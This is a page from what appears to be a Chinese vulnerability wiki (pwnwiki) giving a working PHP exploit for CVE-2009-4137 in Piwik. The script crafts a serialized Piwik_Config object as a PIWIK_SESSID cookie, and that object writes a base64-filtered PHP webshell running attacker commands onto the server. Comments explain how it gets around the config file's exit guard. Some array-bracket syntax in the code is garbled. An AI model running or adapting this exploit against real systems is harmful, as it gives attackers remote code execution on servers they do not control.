免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
EXP
<?php
/*
We exploit the CVE-2009-4137 by using a php object injection of a Piwik_Config object
The __destruct() function of this object writes the config to the path specified in the pathIniFileUserConfig variable
The content of a config file is always prepended by a php showstopper as seen in the following two code-lines of Config.php
$configFile = "; <?php exit; ?> DO NOT REMOVE THIS LINE\n";
$configFile .= "; file automatically generated or modified by Piwik; you can manually override the default values in global.ini.php by redefining them in this file.\n";
To circumvent this, we use php://filter/write=convert.base64-decode and pre-encode our payload. PHP is nice enough to just skip every character that is not part of the base64 alphabet
We then prepend a single character to correct the padding to our payload and write a simple php webshell.
A request to the piwik server with the cookie then triggers the exploit
(You need to url_encode the Cookie if you use manual requests. The '+' and '/' characters of the base64 alphabet must be encoded)
*/
class Zend_Config {
protected $_data = array(
"login" => "root",
"password" => "rootroot",
"email" => "email protected"
);
}
class Piwik_Config {
protected $configFileUpdated = true;
protected $doWriteFileWhenUpdated = true;
protected $correctCwd = ".";
protected $pathIniFileUserConfig = "php://filter/write=convert.base64-decode/resource=/var/www/piwik/webshell.php";
protected $userConfig = array();
function __construct() { // 'a' for padding
$this->userConfig"a".base64_encode('<?php system($_GET\'cmd\'); ?>'."\n") = new Zend_Config;
}
}
$b64 = base64_encode(serialize(new Piwik_Config));
$urlEncoded = urlencode($b64);
echo "Use this cookie";
echo "PIWIK_SESSID=".$urlEncoded."\n";
?>
免费、自由、人人可编辑的漏洞库
